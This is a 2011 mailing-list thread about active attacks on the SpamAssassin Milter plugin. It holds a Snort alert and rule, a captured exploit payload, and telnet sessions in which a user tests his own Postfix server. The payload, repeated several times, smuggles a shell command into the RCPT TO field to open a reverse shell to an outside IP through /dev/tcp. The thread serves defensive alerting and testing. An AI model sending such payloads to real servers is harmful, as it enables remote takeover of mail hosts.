spamassassin-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From JKL <ju...@klunky.co.uk>
Subject Re: Fwd: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
Date Thu, 10 Feb 2011 22:10:51 GMT
Hi,

Seems ok with postfix unless I missed something, which is possible.

$ telnet klunky.co.uk 25
Trying 62.58.61.184...
Connected to logout.klunky.co.uk.
Escape character is '^]'.
220 klunky.co.uk ESMTP Postfix
ehlo klunky.co.uk
250-klunky.co.uk
250-PIPELINING
250-SIZE 20480000
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
MAIL FROM:<asdasd@klunky.co.uk>
250 2.1.0 Ok
RCPT TO:root+:"|touch /tmp/foo"
501 5.1.3 Bad recipient address syntax
RCPT TO:<root+:"|touch /tmp/foo">
550 5.1.0 <asdasd@klunky.co.uk>: Sender address rejected: User unknown
in virtual mailbox table
RCPT TO:<root@localhost+:"|touch /tmp/foo">
501 5.1.3 Bad recipient address syntax
rcpt to: root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"
501 5.1.3 Bad recipient address syntax
rcpt to:<root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0">
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
.
qu250 2.0.0 Ok: queued as 24E96819DF
502 5.5.2 Error: command not recognized
it
221 2.0.0 Bye
Connection closed by foreign host.
$ telnet klunky.co.uk 25
Trying 62.58.61.184...
Connected to logout.klunky.co.uk.
Escape character is '^]'.
220 klunky.co.uk ESMTP Postfix
ehlo klunky.co.uk
250-klunky.co.uk
250-PIPELINING
250-SIZE 20480000
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
MAIL FROM:<asdasd@klunky.co.uk>
250 2.1.0 Ok
rcpt to:<root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0">
550 5.1.0 <asdasd@klunky.co.uk>: Sender address rejected: User unknown
in virtual mailbox table
quit
221 2.0.0 Bye
Connection closed by foreign host.
$ telnet klunky.co.uk 25
Trying 62.58.61.184...
Connected to logout.klunky.co.uk.
Escape character is '^]'.
220 klunky.co.uk ESMTP Postfix
ehlo klunky.co.uk
250-klunky.co.uk
250-PIPELINING
250-SIZE 20480000
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
MAIL FROM:<asdasd@klunky.co.uk>
250 2.1.0 Ok
rcpt to:<root+:"|exec /bin/sh 0</dev/tcp/62.58.61.184/45295 1>&0 2>&0">
550 5.1.0 <asdasd@klunky.co.uk>: Sender address rejected: User unknown
in virtual mailbox table
quit
221 2.0.0 Bye
Connection closed by foreign host.





On 02/10/2011 06:42 PM, Michael Scheidell wrote:
> heads up:
>
> if case you are using spamassassin milter:
>
> active exploits going on.
>
> <http://seclists.org/fulldisclosure/2010/Mar/140>
> <http://www.securityfocus.com/bid/38578>
>
> Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1
>
> I don't see anything on bugtraq about a fix.
>
>
> -------- Original Message --------
> Subject: 	RE: alert: New event: ET EXPLOIT Possible SpamAssassin
> Milter Plugin Remote Arbitrary Command Injection Attempt
>
> 	
>
> 	
>
> 	
>
> 	
>
>
>
> The rule is only looking for this:
>
> content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|";
>
>  
>
> Personally, I would probably block it.  Although, if we’re not seeing
> this sort of thing pop up on customer’s boxes, a manual block in
> scanner2 is sufficient for now, right?
>
>  
>
> Either way, let me know and I’ll block/unblock/leave alone.
>
>  
>
>  
>
> --
>
> John Meyer
>
> Associate Security Engineer
>
> >|SECNAP Network Security
>
> Office: (561) 999-5000 x:1235
>
> Direct: (561) 948-2264
>
>  
>
> *From:*Michael Scheidell
> *Sent:* Thursday, February 10, 2011 12:25 PM
> *To:* John Meyer
> *Cc:* Jonathan Scheidell; Anthony Wetula
> *Subject:* Re: alert: New event: ET EXPLOIT Possible SpamAssassin
> Milter Plugin Remote Arbitrary Command Injection Attempt
>
>  
>
> is the snort rule specific enough that you can block the offending ip
> for 5 mins?
>
> (if its a real smtp server, it will retry) and legit email through.
>
>
>
> On 2/10/11 12:12 PM, John Meyer wrote:
>
> I don’t like the looks of this.  I blocked that IP with samtool.
>
>  
>
> Payload:
>
>  
>
> rcpt to: root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"
>
> data
>
> .
>
> quit
>
>  
>
>  
>
>  
>
> --
>
> John Meyer
>
> Associate Security Engineer
>
> >|SECNAP Network Security
>
> Office: (561) 999-5000 x:1235
>
> Direct: (561) 948-2264
>
>  
>
> *From:*SECNAP Network Security
> *Sent:* Thursday, February 10, 2011 12:01 PM
> *To:* security-alert@scanner2.secnap.com
> *Subject:* alert: New event: ET EXPLOIT Possible SpamAssassin Milter
> Plugin Remote Arbitrary Command Injection Attempt
>
>  
>
> 02/10-12:00:59 <trust1> TCP 62.206.228.188:56691 --> 10.70.1.33:25
> [1:2010877:3] ET EXPLOIT Possible SpamAssassin Milter Plugin Remote
> Arbitrary Command Injection Attempt
> [Classification: Attempted User Privilege Gain] [Priority: 1]
>
>  
>
> -- 
> Michael Scheidell, CTO
> o: 561-999-5000
> d: 561-948-2259
> ISN: 1259*1300
> >*| *SECNAP Network Security Corporation
>
> ·         Certified SNORT Integrator
>
> ·         2008-9 Hot Company Award Winner, World Executive Alliance
>
> ·         Five-Star Partner Program 2009, VARBusiness
>
> ·         Best in Email Security,2010: Network Products Guide
>
> ·         King of Spam Filters, SC Magazine 2008
>
>
> ------------------------------------------------------------------------
>
> This email has been scanned and certified safe by SpammerTrap®.
> For Information please see http://www.secnap.com/products/spammertrap/
>
> ------------------------------------------------------------------------
>

Mime
View raw message